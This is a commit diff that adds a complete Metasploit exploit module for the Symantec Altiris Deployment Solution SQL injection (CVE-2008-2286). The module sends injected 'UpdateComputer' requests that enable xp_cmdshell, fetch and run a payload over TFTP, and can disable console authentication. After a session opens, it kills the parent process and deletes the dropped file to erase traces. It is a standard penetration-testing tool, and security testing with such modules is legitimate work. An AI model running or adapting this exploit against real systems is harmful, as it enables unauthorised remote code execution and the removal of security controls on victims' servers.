commit
d419c73488
|
@ -0,0 +1,203 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::CmdStagerTFTP
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Symantec Altiris DS SQL Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8
|
||||
to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize
|
||||
numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
|
||||
several SQL injections are required in close succession, first to enable xp_cmdshell, then
|
||||
retrieve the payload via TFTP and finally execute it. The module also has the capability
|
||||
to disable or enable local application authentication. In order to work the target system
|
||||
must have a tftp client available.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Brett Moore', # Vulnerability discovery
|
||||
'3v0lver' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-2286' ],
|
||||
[ 'OSVDB', '45313' ],
|
||||
[ 'BID', '29198'],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows 2003 (with tftp client available)',
|
||||
{
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'win'
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => 'win',
|
||||
'DisclosureDate' => 'May 15 2008',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(402),
|
||||
OptBool.new('XP_CMDSHELL', [ true, "Enable xp_cmdshell prior to exploit", true]),
|
||||
OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
|
||||
OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
inject=[]
|
||||
|
||||
if @xp_shell_enable
|
||||
inject+=[
|
||||
"#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure",'')}",
|
||||
"#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure",'')}",
|
||||
]
|
||||
@xp_shell_enable = false
|
||||
end
|
||||
|
||||
if @wc_disable_security
|
||||
inject+=["#{Rex::Text.to_hex("wc_upd_disable_security",'')}"]
|
||||
@wc_disable_security = false
|
||||
end
|
||||
|
||||
if @wc_enable_security
|
||||
inject+=["#{Rex::Text.to_hex("wc_upd_enable_security",'')}"]
|
||||
@wc_enable_security = false
|
||||
end
|
||||
|
||||
inject+=["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'",'')}"] if cmd != nil
|
||||
|
||||
inject.each do |sqli|
|
||||
send_update_computer("2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--")
|
||||
end
|
||||
end
|
||||
|
||||
def send_update_computer(processor_speed)
|
||||
notification = %Q|Request=UpdateComputer
|
||||
OS-Bit=32
|
||||
CPU-Arch=x86
|
||||
IP-Address=192.168.20.107
|
||||
MAC-Address=005056C000AB
|
||||
Name=Remove_test
|
||||
OS=Windows XP
|
||||
Version=2.6-38 (32-Bit)
|
||||
LoggedIn=Yes
|
||||
Boot-Env=Automation
|
||||
Platform=Linux
|
||||
Agent-Settings=Same
|
||||
Sys-Info-TimeZoneBias=0
|
||||
Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
|
||||
Processor-Speed=#{processor_speed}
|
||||
\x00
|
||||
|
|
||||
|
||||
connect
|
||||
sock.put(notification)
|
||||
response = sock.get_once()
|
||||
disconnect
|
||||
|
||||
return response
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_update_computer("2659")
|
||||
|
||||
unless res and res =~ /Result=Success/ and res=~ /DSVersion=(.*)/
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
version = $1
|
||||
|
||||
unless version =~ /^6\.(\d+)\.(\d+)$/
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
print_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'"
|
||||
|
||||
minor = $1.to_i
|
||||
build = $2.to_i
|
||||
|
||||
if minor == 8
|
||||
if build == 206 || build == 282 || build == 378
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
elsif build < 390
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
elsif minor == 9 and build < 176
|
||||
#The existence of versions matching this profile is a possibility... none were observed in the wild though
|
||||
#as such, we're basing confidence off of Symantec's vulnerability bulletin.
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
@wc_disable_security = datastore['DISABLE_SECURITY']
|
||||
@wc_enable_security = datastore['ENABLE_SECURITY']
|
||||
@xp_shell_enable = datastore['XP_CMDSHELL']
|
||||
|
||||
# CmdStagerVBS was tested here as well, however delivery took roughly
|
||||
# 30 minutes and required sending almost 350 notification messages.
|
||||
# size constraint requirement for SQLi is: linemax => 393
|
||||
execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\'})
|
||||
end
|
||||
|
||||
def on_new_session(client)
|
||||
return if not payload_exe
|
||||
|
||||
#can't scrub dropped payload while the process is still active so...
|
||||
#iterate through process list, find our process and the associated
|
||||
#parent process ID, Kill the parent.
|
||||
#This module doesn't use FileDropper because of timing issues when
|
||||
#using migrate -f and FileDropper. On the other hand PrependMigrate
|
||||
#has been avoided because of issues with reverse_https payload
|
||||
#SeeRM#8365 https://http://dev.metasploit.com/redmine/issues/8365
|
||||
|
||||
unless client.type == "meterpreter"
|
||||
print_error("Automatic cleanup only available with meterpreter, please delete #{payload_exe} manually")
|
||||
return
|
||||
end
|
||||
|
||||
client.core.use("stdapi") unless client.ext.aliases.include?("stdapi")
|
||||
# migrate
|
||||
print_status("Migrating ...")
|
||||
client.console.run_single("run migrate -f")
|
||||
# kill the parent process so the payload can hopefully be dropped
|
||||
print_status("Kill parent process ...")
|
||||
client.sys.process.get_processes().each do |proc|
|
||||
if proc['pid'] == client.sys.process.open.pid
|
||||
client.sys.process.kill(proc['ppid'])
|
||||
end
|
||||
end
|
||||
|
||||
win_temp = client.fs.file.expand_path("%TEMP%")
|
||||
win_file = "#{win_temp}\\#{payload_exe}"
|
||||
print_status("Attempting to delete #{win_file} ...")
|
||||
client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
|
||||
client.fs.file.rm(win_file)
|
||||
print_good("Deleted #{win_file}")
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue